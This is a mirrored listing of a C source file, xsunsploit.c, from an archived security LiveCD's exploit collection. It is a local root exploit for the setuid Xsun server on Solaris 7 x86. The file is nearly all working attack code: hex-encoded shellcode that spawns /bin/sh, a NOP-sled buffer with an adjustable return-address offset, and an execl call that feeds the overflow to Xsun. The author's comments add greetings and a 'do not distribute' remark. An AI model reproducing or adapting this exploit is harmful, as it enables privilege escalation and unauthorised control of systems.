home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / xsunsploit.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  53 lines

  1. /*
  2.  *
  3.  * Solaris 7  Xsun(suid) local overflow - PRIVATE for now!
  4.  * Solaris 2.7/(2.6?) x86 sploit no sparc code, yet!
  5.  *
  6.  * Discovered/sploited By DiGiT - teddi@linux.is
  7.  *
  8.  * Greets to all the guys at #hax.
  9.  * Special greetz to crazy-b! and my Icelandic brother Icemav!!
  10.  *
  11.  * ═slendingar gefi≡ mΘr VINNU! - ═sland lengi lifi or whatever.
  12.  *
  13.  * this is a pre sploit so do not distribute!
  14.  *
  15.  * if this dosen't work, you will need to brute the offset.
  16.  */
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20.  
  21. // Generic solaris x86 shellcode by cheeze wizz
  22.  
  23. char shellcode[] =
  24.  "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  25.  "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  26.  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  27.  "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  28.  "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  29.  "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  30.  
  31. long get_esp() { __asm__("movl %esp,%eax"); }
  32.  
  33. int main(int argc, char *argv[]) {
  34.  
  35.   char buff[5000];
  36.   int nopcount=2001, bsize=4000, offset=1850;
  37.   int i;
  38.  
  39.   if (argc > 1) nopcount  = atoi(argv[1]);
  40.   if (argc > 2) bsize  = atoi(argv[2]);
  41.   if (argc > 3) offset = atoi(argv[3]);
  42.  
  43.   memset (buff, 0x90, bsize);
  44.  
  45.   for (i = nopcount; i < bsize - 4; i += 4)
  46.     *(long *) &buff[i] = get_esp() + offset;
  47.  
  48.   memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen(shellcode));
  49.   memcpy (buff, ":", 1);
  50.   printf("Oh boy. DiGiT presents r00t\n");
  51.   execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buff, NULL);
  52. }
  53.